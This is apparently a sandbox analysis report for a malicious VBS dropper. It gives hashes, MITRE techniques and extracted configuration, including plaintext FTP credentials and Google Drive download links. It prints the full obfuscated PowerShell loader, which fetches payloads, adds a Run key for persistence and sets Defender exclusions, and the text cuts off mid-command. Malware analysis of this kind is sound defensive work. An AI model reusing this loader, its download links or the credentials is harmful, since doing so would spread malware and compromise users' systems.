f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 01:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs
Size

689KB
MD5

8fd7c00084879a12a737d7ad5b3c18d8
SHA1

ee92384a30a5765beacf8f902e22e99c9826b781
SHA256

f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73
SHA512

814c7ef16ccf2cea69f3feed9d3bee085cc956e24f48893025f336ce1e7ee6cd945f468ebaa1f22021b8e08c862d2fbd288221f646e799689ad9e1bf758122d5
SSDEEP

1536:VPPPPPPPPPPPPPPPPPPPPPPPE777777777777777777777777777777777777773:xJT0FT2U

Score

10^/10

defense_evasion execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Blocklisted process makes network request 23 IoCs

flow	pid	Process
7	3760	powershell.exe
13	3760	powershell.exe
15	3760	powershell.exe
26	3760	powershell.exe
32	3760	powershell.exe
34	3760	powershell.exe
42	3760	powershell.exe
47	3760	powershell.exe
54	3760	powershell.exe
58	3760	powershell.exe
59	3760	powershell.exe
64	3760	powershell.exe
68	3760	powershell.exe
69	3760	powershell.exe
70	3760	powershell.exe
78	3760	powershell.exe
79	3760	powershell.exe
83	3760	powershell.exe
84	3760	powershell.exe
85	3760	powershell.exe
86	3760	powershell.exe
87	3760	powershell.exe
88	3760	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3980	powershell.exe
4880	powershell.exe
2400	powershell.exe
4136	powershell.exe
3760	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_rni = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\pwxir.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4136	powershell.exe
4136	powershell.exe
3760	powershell.exe
3760	powershell.exe
3760	powershell.exe
4880	powershell.exe
3980	powershell.exe
3980	powershell.exe
4880	powershell.exe
2400	powershell.exe
2400	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeDebugPrivilege	3760	powershell.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	2400	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2008 wrote to memory of 4136	2008	WScript.exe	84
PID 2008 wrote to memory of 4136	2008	WScript.exe	84
PID 4136 wrote to memory of 3760	4136	powershell.exe	86
PID 4136 wrote to memory of 3760	4136	powershell.exe	86
PID 3760 wrote to memory of 3980	3760	powershell.exe	90
PID 3760 wrote to memory of 3980	3760	powershell.exe	90
PID 3760 wrote to memory of 4880	3760	powershell.exe	91
PID 3760 wrote to memory of 4880	3760	powershell.exe	91
PID 3760 wrote to memory of 4912	3760	powershell.exe	92
PID 3760 wrote to memory of 4912	3760	powershell.exe	92
PID 3760 wrote to memory of 2400	3760	powershell.exe	93
PID 3760 wrote to memory of 2400	3760	powershell.exe	93
PID 3760 wrote to memory of 4032	3760	powershell.exe	98
PID 3760 wrote to memory of 4032	3760	powershell.exe	98
PID 3760 wrote to memory of 4144	3760	powershell.exe	99
PID 3760 wrote to memory of 4144	3760	powershell.exe	99
PID 3760 wrote to memory of 2612	3760	powershell.exe	102
PID 3760 wrote to memory of 2612	3760	powershell.exe	102
PID 3760 wrote to memory of 2344	3760	powershell.exe	103
PID 3760 wrote to memory of 2344	3760	powershell.exe	103
PID 3760 wrote to memory of 1220	3760	powershell.exe	105
PID 3760 wrote to memory of 1220	3760	powershell.exe	105
PID 3760 wrote to memory of 1260	3760	powershell.exe	106
PID 3760 wrote to memory of 1260	3760	powershell.exe	106
PID 3760 wrote to memory of 4420	3760	powershell.exe	110
PID 3760 wrote to memory of 4420	3760	powershell.exe	110
PID 3760 wrote to memory of 4808	3760	powershell.exe	111
PID 3760 wrote to memory of 4808	3760	powershell.exe	111
PID 3760 wrote to memory of 3500	3760	powershell.exe	113
PID 3760 wrote to memory of 3500	3760	powershell.exe	113
PID 3760 wrote to memory of 3796	3760	powershell.exe	114
PID 3760 wrote to memory of 3796	3760	powershell.exe	114
PID 3760 wrote to memory of 720	3760	powershell.exe	115
PID 3760 wrote to memory of 720	3760	powershell.exe	115
PID 3760 wrote to memory of 2976	3760	powershell.exe	116
PID 3760 wrote to memory of 2976	3760	powershell.exe	116
PID 3760 wrote to memory of 3808	3760	powershell.exe	117
PID 3760 wrote to memory of 3808	3760	powershell.exe	117
PID 3760 wrote to memory of 1788	3760	powershell.exe	118
PID 3760 wrote to memory of 1788	3760	powershell.exe	118
PID 3760 wrote to memory of 2112	3760	powershell.exe	121
PID 3760 wrote to memory of 2112	3760	powershell.exe	121
PID 3760 wrote to memory of 1252	3760	powershell.exe	122
PID 3760 wrote to memory of 1252	3760	powershell.exe	122
PID 3760 wrote to memory of 1764	3760	powershell.exe	123
PID 3760 wrote to memory of 1764	3760	powershell.exe	123
PID 3760 wrote to memory of 3176	3760	powershell.exe	124
PID 3760 wrote to memory of 3176	3760	powershell.exe	124
PID 3760 wrote to memory of 4640	3760	powershell.exe	125
PID 3760 wrote to memory of 4640	3760	powershell.exe	125
PID 3760 wrote to memory of 2572	3760	powershell.exe	126
PID 3760 wrote to memory of 2572	3760	powershell.exe	126
PID 3760 wrote to memory of 1972	3760	powershell.exe	127
PID 3760 wrote to memory of 1972	3760	powershell.exe	127
PID 3760 wrote to memory of 4832	3760	powershell.exe	128
PID 3760 wrote to memory of 4832	3760	powershell.exe	128
PID 3760 wrote to memory of 3824	3760	powershell.exe	131
PID 3760 wrote to memory of 3824	3760	powershell.exe	131
PID 3760 wrote to memory of 4312	3760	powershell.exe	132
PID 3760 wrote to memory of 4312	3760	powershell.exe	132
PID 3760 wrote to memory of 4464	3760	powershell.exe	134
PID 3760 wrote to memory of 4464	3760	powershell.exe	134
PID 3760 wrote to memory of 3472	3760	powershell.exe	135
PID 3760 wrote to memory of 3472	3760	powershell.exe	135

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9せㅚしDsせㅚしKQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしDEせㅚしZQB1せㅚしHIせㅚしdせㅚしせㅚしnせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしGUせㅚしagB3せㅚしHoせㅚしaせㅚしせㅚしkせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしCcせㅚしaせㅚしB0せㅚしHQせㅚしcせㅚしBzせㅚしDoせㅚしLwせㅚしvせㅚしHcせㅚしdwB3せㅚしC4せㅚしbQBlせㅚしGQせㅚしaQBhせㅚしGYせㅚしaQByせㅚしGUせㅚしLgBjせㅚしG8せㅚしbQせㅚしvせㅚしGYせㅚしaQBsせㅚしGUせㅚしLwBkせㅚしGsせㅚしdwB5せㅚしDkせㅚしZせㅚしBzせㅚしHQせㅚしbせㅚしBuせㅚしDUせㅚしYwBhせㅚしGoせㅚしYQせㅚしvせㅚしGEせㅚしZwB1せㅚしC4せㅚしdせㅚしB4せㅚしHQせㅚしLwBmせㅚしGkせㅚしbせㅚしBlせㅚしCcせㅚしIせㅚしせㅚしoせㅚしCせㅚしせㅚしXQBdせㅚしFsせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしG8せㅚしWwせㅚしgせㅚしCwせㅚしIせㅚしBsせㅚしGwせㅚしdQBuせㅚしCQせㅚしIせㅚしせㅚしoせㅚしGUせㅚしawBvせㅚしHYせㅚしbgBJせㅚしC4せㅚしKQせㅚしgせㅚしCcせㅚしSQBWせㅚしEYせㅚしcgBwせㅚしCcせㅚしIせㅚしせㅚしoせㅚしGQせㅚしbwBoせㅚしHQせㅚしZQBNせㅚしHQせㅚしZQBHせㅚしC4せㅚしKQせㅚしnせㅚしDEせㅚしcwBzせㅚしGEせㅚしbせㅚしBDせㅚしC4せㅚしMwB5せㅚしHIせㅚしYQByせㅚしGIせㅚしaQBMせㅚしHMせㅚしcwBhせㅚしGwせㅚしQwせㅚしnせㅚしCgせㅚしZQBwせㅚしHkせㅚしVせㅚしB0せㅚしGUせㅚしRwせㅚしuせㅚしCkせㅚしIせㅚしB4せㅚしG0せㅚしegBYせㅚしHgせㅚしJせㅚしせㅚしgせㅚしCgせㅚしZせㅚしBhせㅚしG8せㅚしTせㅚしせㅚしuせㅚしG4せㅚしaQBhせㅚしG0せㅚしbwBEせㅚしHQせㅚしbgBlせㅚしHIせㅚしcgB1せㅚしEMせㅚしOgせㅚし6せㅚしF0せㅚしbgBpせㅚしGEせㅚしbQBvせㅚしEQせㅚしcせㅚしBwせㅚしEEせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしDsせㅚしKQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしEEせㅚしJwせㅚしgせㅚしCwせㅚしIせㅚしせㅚしnせㅚしJMhOgCTIScせㅚしIせㅚしせㅚしoせㅚしGUせㅚしYwBhせㅚしGwせㅚしcせㅚしBlせㅚしFIせㅚしLgBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚしgせㅚしCgせㅚしZwBuせㅚしGkせㅚしcgB0せㅚしFMせㅚしNせㅚしせㅚし2せㅚしGUせㅚしcwBhせㅚしEIせㅚしbQBvせㅚしHIせㅚしRgせㅚし6せㅚしDoせㅚしXQB0せㅚしHIせㅚしZQB2せㅚしG4せㅚしbwBDせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしB4せㅚしG0せㅚしegBYせㅚしHgせㅚしJせㅚしせㅚしgせㅚしF0せㅚしXQBbせㅚしGUせㅚしdせㅚしB5せㅚしEIせㅚしWwせㅚし7せㅚしCcせㅚしJQBJせㅚしGgせㅚしcQBSせㅚしFgせㅚしJQせㅚしnせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGUせㅚしagB3せㅚしHoせㅚしaせㅚしせㅚしkせㅚしDsせㅚしKQせㅚしgせㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしCせㅚしせㅚしKせㅚしBnせㅚしG4せㅚしaQByせㅚしHQせㅚしUwBkせㅚしGEせㅚしbwBsせㅚしG4せㅚしdwBvせㅚしEQせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚし7せㅚしDgせㅚしRgBUせㅚしFUせㅚしOgせㅚし6せㅚしF0せㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしdせㅚしB4せㅚしGUせㅚしVせㅚしせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwせㅚしpせㅚしHQせㅚしbgBlせㅚしGkせㅚしbせㅚしBDせㅚしGIせㅚしZQBXせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしTwせㅚしtせㅚしHcせㅚしZQBOせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwせㅚしpせㅚしCgせㅚしZQBzせㅚしG8せㅚしcせㅚしBzせㅚしGkせㅚしZせㅚしせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQせㅚしgせㅚしCcせㅚしdせㅚしB4せㅚしHQせㅚしLgせㅚしxせㅚしDせㅚしせㅚしTせㅚしBMせㅚしEQせㅚしLwせㅚしxせㅚしDせㅚしせㅚしLwByせㅚしGUせㅚしdせㅚしBwせㅚしHkせㅚしcgBjせㅚしHせㅚしせㅚしVQせㅚしvせㅚしHIせㅚしYgせㅚしuせㅚしG0せㅚしbwBjせㅚしC4せㅚしdせㅚしBhせㅚしHIせㅚしYgB2せㅚしGsせㅚしYwBzせㅚしGUせㅚしZせㅚしせㅚしuせㅚしHせㅚしせㅚしdせㅚしBmせㅚしEせㅚしせㅚしMQB0せㅚしGEせㅚしcgBiせㅚしHYせㅚしawBjせㅚしHMせㅚしZQBkせㅚしC8せㅚしLwせㅚし6せㅚしHせㅚしせㅚしdせㅚしBmせㅚしCcせㅚしIせㅚしせㅚしoせㅚしGcせㅚしbgBpせㅚしHIせㅚしdせㅚしBTせㅚしGQせㅚしYQBvせㅚしGwせㅚしbgB3せㅚしG8せㅚしRせㅚしせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしCせㅚしせㅚしPQせㅚしgせㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしDsせㅚしKQせㅚしnせㅚしEせㅚしせㅚしQせㅚしBwせㅚしEoせㅚしOせㅚしせㅚし3せㅚしDUせㅚしMQせㅚしyせㅚしG8せㅚしcgBwせㅚしHIせㅚしZQBwせㅚしG8せㅚしbせㅚしBlせㅚしHYせㅚしZQBkせㅚしCcせㅚしLせㅚしせㅚしnせㅚしDEせㅚしdせㅚしBhせㅚしHIせㅚしYgB2せㅚしGsせㅚしYwBzせㅚしGUせㅚしZせㅚしせㅚしnせㅚしCgせㅚしbせㅚしBhせㅚしGkせㅚしdせㅚしBuせㅚしGUせㅚしZせㅚしBlせㅚしHIせㅚしQwBrせㅚしHIせㅚしbwB3せㅚしHQせㅚしZQBOせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwせㅚしgせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBvせㅚしC0せㅚしdwBlせㅚしG4せㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしcwBsせㅚしGEせㅚしaQB0せㅚしG4せㅚしZQBkせㅚしGUせㅚしcgBDせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwせㅚし4せㅚしEYせㅚしVせㅚしBVせㅚしDoせㅚしOgBdせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしHQせㅚしeせㅚしBlせㅚしFQせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQB0せㅚしG4せㅚしZQBpせㅚしGwせㅚしQwBiせㅚしGUせㅚしVwせㅚしuせㅚしHQせㅚしZQBOせㅚしCせㅚしせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしE8せㅚしLQB3せㅚしGUせㅚしTgせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしOwせㅚしyせㅚしDEせㅚしcwBsせㅚしFQせㅚしOgせㅚし6せㅚしF0せㅚしZQBwせㅚしHkせㅚしVせㅚしBsせㅚしG8せㅚしYwBvせㅚしHQせㅚしbwByせㅚしFせㅚしせㅚしeQB0せㅚしGkせㅚしcgB1せㅚしGMせㅚしZQBTせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGwせㅚしbwBjせㅚしG8せㅚしdせㅚしBvせㅚしHIせㅚしUせㅚしB5せㅚしHQせㅚしaQByせㅚしHUせㅚしYwBlせㅚしFMせㅚしOgせㅚし6せㅚしF0せㅚしcgBlせㅚしGcせㅚしYQBuせㅚしGEせㅚしTQB0せㅚしG4せㅚしaQBvせㅚしFせㅚしせㅚしZQBjせㅚしGkせㅚしdgByせㅚしGUせㅚしUwせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚし7せㅚしH0せㅚしZQB1せㅚしHIせㅚしdせㅚしせㅚしkせㅚしHsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしawBjせㅚしGEせㅚしYgBsせㅚしGwせㅚしYQBDせㅚしG4せㅚしbwBpせㅚしHQせㅚしYQBkせㅚしGkせㅚしbせㅚしBhせㅚしFYせㅚしZQB0せㅚしGEせㅚしYwBpせㅚしGYせㅚしaQB0せㅚしHIせㅚしZQBDせㅚしHIせㅚしZQB2せㅚしHIせㅚしZQBTせㅚしDoせㅚしOgBdせㅚしHIせㅚしZQBnせㅚしGEせㅚしbgBhせㅚしE0せㅚしdせㅚしBuせㅚしGkせㅚしbwBQせㅚしGUせㅚしYwBpせㅚしHYせㅚしcgBlせㅚしFMせㅚしLgB0せㅚしGUせㅚしTgせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしewせㅚしgせㅚしGUせㅚしcwBsせㅚしGUせㅚしfQせㅚしgせㅚしGYせㅚしLwせㅚしgせㅚしDせㅚしせㅚしIせㅚしB0せㅚしC8せㅚしIせㅚしByせㅚしC8せㅚしIせㅚしBlせㅚしHgせㅚしZQせㅚしuせㅚしG4せㅚしdwBvせㅚしGQせㅚしdせㅚしB1せㅚしGgせㅚしcwせㅚしgせㅚしDsせㅚしJwせㅚしwせㅚしDgせㅚしMQせㅚしgせㅚしHせㅚしせㅚしZQBlせㅚしGwせㅚしcwせㅚしnせㅚしCせㅚしせㅚしZせㅚしBuせㅚしGEせㅚしbQBtせㅚしG8せㅚしYwせㅚしtせㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBsせㅚしGwせㅚしZQBoせㅚしHMせㅚしcgBlせㅚしHcせㅚしbwBwせㅚしDsせㅚしIせㅚしBlせㅚしGMせㅚしcgBvせㅚしGYせㅚしLQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしHせㅚしせㅚしdQB0せㅚしHIせㅚしYQB0せㅚしFMせㅚしXせㅚしBzせㅚしG0せㅚしYQByせㅚしGcせㅚしbwByせㅚしFせㅚしせㅚしXせㅚしB1せㅚしG4せㅚしZQBNせㅚしCせㅚしせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしFwせㅚしcwB3せㅚしG8せㅚしZせㅚしBuせㅚしGkせㅚしVwBcせㅚしHQせㅚしZgBvせㅚしHMせㅚしbwByせㅚしGMせㅚしaQBNせㅚしFwせㅚしZwBuせㅚしGkせㅚしbQBhせㅚしG8せㅚしUgBcせㅚしGEせㅚしdせㅚしBhせㅚしEQせㅚしcせㅚしBwせㅚしEEせㅚしXせㅚしせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしHせㅚしせㅚしdQB0せㅚしHIせㅚしYQB0せㅚしFMせㅚしZせㅚしBsせㅚしG8せㅚしRgせㅚしkせㅚしCせㅚしせㅚしKせㅚしせㅚしgせㅚしG4せㅚしbwBpせㅚしHQせㅚしYQBuせㅚしGkせㅚしdせㅚしBzせㅚしGUせㅚしRせㅚしせㅚしtせㅚしCせㅚしせㅚしJwせㅚしlせㅚしEkせㅚしaせㅚしBxせㅚしFIせㅚしWせㅚしせㅚしlせㅚしCcせㅚしIせㅚしBtせㅚしGUせㅚしdせㅚしBJせㅚしC0せㅚしeQBwせㅚしG8せㅚしQwせㅚしgせㅚしDsせㅚしIせㅚしB0せㅚしHIせㅚしYQB0せㅚしHMせㅚしZQByせㅚしG8せㅚしbgせㅚしvせㅚしCせㅚしせㅚしdせㅚしBlせㅚしGkせㅚしdQBxせㅚしC8せㅚしIせㅚしBlせㅚしGwせㅚしaQBmせㅚしCQせㅚしIせㅚしBlせㅚしHgせㅚしZQせㅚしuせㅚしGEせㅚしcwB1せㅚしHcせㅚしIせㅚしBlせㅚしHgせㅚしZQせㅚしuせㅚしGwせㅚしbせㅚしBlせㅚしGgせㅚしcwByせㅚしGUせㅚしdwBvせㅚしHせㅚしせㅚしIせㅚしせㅚし7せㅚしCkせㅚしJwB1せㅚしHMせㅚしbQせㅚしuせㅚしG4せㅚしaQB3せㅚしHせㅚしせㅚしVQBcせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしYQB0せㅚしHMせㅚしYQBwせㅚしCQせㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBlせㅚしGwせㅚしaQBmせㅚしCQせㅚしOwせㅚしpせㅚしCせㅚしせㅚしZQBtせㅚしGEせㅚしTgByせㅚしGUせㅚしcwBVせㅚしDoせㅚしOgBdせㅚしHQせㅚしbgBlせㅚしG0せㅚしbgBvせㅚしHIせㅚしaQB2せㅚしG4せㅚしRQBbせㅚしCせㅚしせㅚしKwせㅚしgせㅚしCcせㅚしXせㅚしBzせㅚしHIせㅚしZQBzせㅚしFUせㅚしXせㅚしせㅚし6せㅚしEMせㅚしJwせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHせㅚしせㅚしdQB0せㅚしHIせㅚしYQB0せㅚしFMせㅚしZせㅚしBsせㅚしG8せㅚしRgせㅚしkせㅚしDsせㅚしKQせㅚしnせㅚしHUせㅚしcwBtせㅚしC4せㅚしbgBpせㅚしHcせㅚしcせㅚしBVせㅚしFwせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBhせㅚしHQせㅚしcwBhせㅚしHせㅚしせㅚしJせㅚしせㅚしgせㅚしCwせㅚしQgBLせㅚしEwせㅚしUgBVせㅚしCQせㅚしKせㅚしBlせㅚしGwせㅚしaQBGせㅚしGQせㅚしYQBvせㅚしGwせㅚしbgB3せㅚしG8せㅚしRせㅚしせㅚしuせㅚしFせㅚしせㅚしdwBqせㅚしHMせㅚしagせㅚしkせㅚしDsせㅚしOせㅚしBGせㅚしFQせㅚしVQせㅚし6せㅚしDoせㅚしXQBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgB0せㅚしHgせㅚしZQBUせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgBQせㅚしHcせㅚしagBzせㅚしGoせㅚしJせㅚしせㅚし7せㅚしCkせㅚしdせㅚしBuせㅚしGUせㅚしaQBsせㅚしEMせㅚしYgBlせㅚしFcせㅚしLgB0せㅚしGUせㅚしTgせㅚしgせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBPせㅚしC0せㅚしdwBlせㅚしE4せㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBQせㅚしHcせㅚしagBzせㅚしGoせㅚしJせㅚしせㅚし7せㅚしH0せㅚしOwせㅚしgせㅚしCkせㅚしJwByせㅚしGcせㅚしOせㅚしBEせㅚしDcせㅚしbwBSせㅚしHMせㅚしZgBWせㅚしGMせㅚしcgせㅚしyせㅚしG4せㅚしQQBoせㅚしGYせㅚしaせㅚしBWせㅚしDYせㅚしRせㅚしBDせㅚしHgせㅚしUgBxせㅚしG4せㅚしcQBqせㅚしDUせㅚしagByせㅚしGIせㅚしMQせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしGUせㅚしbせㅚしBUせㅚしFEせㅚしWせㅚしせㅚしkせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZQBsせㅚしFQせㅚしUQBYせㅚしCQせㅚしewせㅚしgせㅚしGUせㅚしcwBsせㅚしGUせㅚしfQせㅚし7せㅚしCせㅚしせㅚしKQせㅚしnせㅚしHgせㅚしNせㅚしBmせㅚしGgせㅚしWgBNせㅚしHcせㅚしTgせㅚし3せㅚしFUせㅚしZQBfせㅚしDせㅚしせㅚしXwせㅚし1せㅚしF8せㅚしaQBjせㅚしHMせㅚしYgBoせㅚしDcせㅚしQwBQせㅚしDせㅚしせㅚしSQBmせㅚしFせㅚしせㅚしZせㅚしBBせㅚしDIせㅚしMQせㅚしxせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしZQBsせㅚしFQせㅚしUQBYせㅚしCQせㅚしKせㅚしせㅚしgAD0AIABlAGwAVABRAFgAJAB7ACAAKQByAGUAVgBuAGkAVwAkACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHIAZQBWAG4AaQBXACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAGUAbABUAFEAWせㅚしAkADsAKQAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABhAHQAcwBhAHAAJAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGEAdABzAGEAcAAkAHsAIAApAHIAZQB3AG8AcAByAGUAVgAkACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIAByAGUAdwBvAHAAcgBlAFYAJAAgADsA';$GBekT = $qCybe.replace('せㅚし' , 'A') ;$QlmBo = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $GBekT ) ); $QlmBo = $QlmBo[-1..-$QlmBo.Length] -join '';$QlmBo = $QlmBo.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs');powershell $QlmBo
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $Verpower = $host.Version.Major.Equals(2) ;if ($Verpower) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$XQTle = 'https://drive.google.com/uc?export=download&id=';$WinVer = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($WinVer) {$XQTle = ($XQTle + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$XQTle = ($XQTle + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$jsjwP = (New-Object Net.WebClient);$jsjwP.Encoding = [System.Text.Encoding]::UTF8;$jsjwP.DownloadFile($URLKB, 